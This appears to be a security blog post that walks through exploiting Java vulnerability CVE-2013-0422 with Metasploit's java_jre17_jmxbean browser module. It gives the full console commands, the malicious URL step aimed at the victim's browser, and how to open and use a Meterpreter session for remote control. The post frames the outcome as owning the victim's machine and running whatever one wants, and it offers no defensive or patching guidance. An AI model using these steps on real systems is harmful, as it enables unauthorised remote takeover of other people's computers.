In this post we’ll show you how to use the Metasploit Framework to exploit Java CVE-2013-0422 vulnerability. This applies to Java versions under 11.
Here is the step by step procedure to exploit this vulnerability:
- Start Metasploit Framework with command msfconsole.
- Configure the exploit for Java u10 JMXBEAN with the following commands:
msf > use exploit/multi/browser/java_jre17_jmxbean
msf exploit (java_jre17_jmxbean) > set SRVHOST [Local_IP_of_Metasploit]
- Execute the exploit with command exploit:
msf exploit (java_jre17_jmxbean) > exploit
- Once executed, look for the following line and copy it.
[*] Using URL: http://[Local_Metasploit_IP]:8080/ksdiksld
- On the victim’s machine, copy the URL in Internet Explorer. You’ll see a white page with the legend “Loading, Please Wait…”.
- In the Metasploit console you’ll see all the steps executed by the exploit. Look for a line similar to the following to obtain the session number which is already open to take remote control on the victim’s machine.
[*] Meterpreter session 1 opened ([Local_Metasploit_IP]:4444 -> [Victim’s_IP]:1506) at …
- Now you have to open the session with the following command (it’s possible you may have to press the “ENTER” key to obtain the prompt back):
msf exploit (java_jre17_jmxbean) > sessions –i 1
where number 1 is the number of session previously obtained.
- Now you’ll get a Meterpreter prompt, here you can execute the sysinfo command to corroborate you actually own the victim’s machine.
- Now that you own the machine, you can execute whatever you want
- To close the session and the exploit just execute the following commands:
meterpreter > exit
msf exploit (java_jre17_jmxbean) > jobs
the output of this command will give you the ID of the executing exploit, to stop it execute the following command:
msf exploit (java_jre17_jmxbean) > kill 0
where “0”is the ID of the exploit previously obtained.
You can search on our tags about Exploits and Metasploit to obtain more info.
Thanks for your visit and remember to send us your questions and comments to our Twitter account: @redinskala where you’ll find more info and security tips.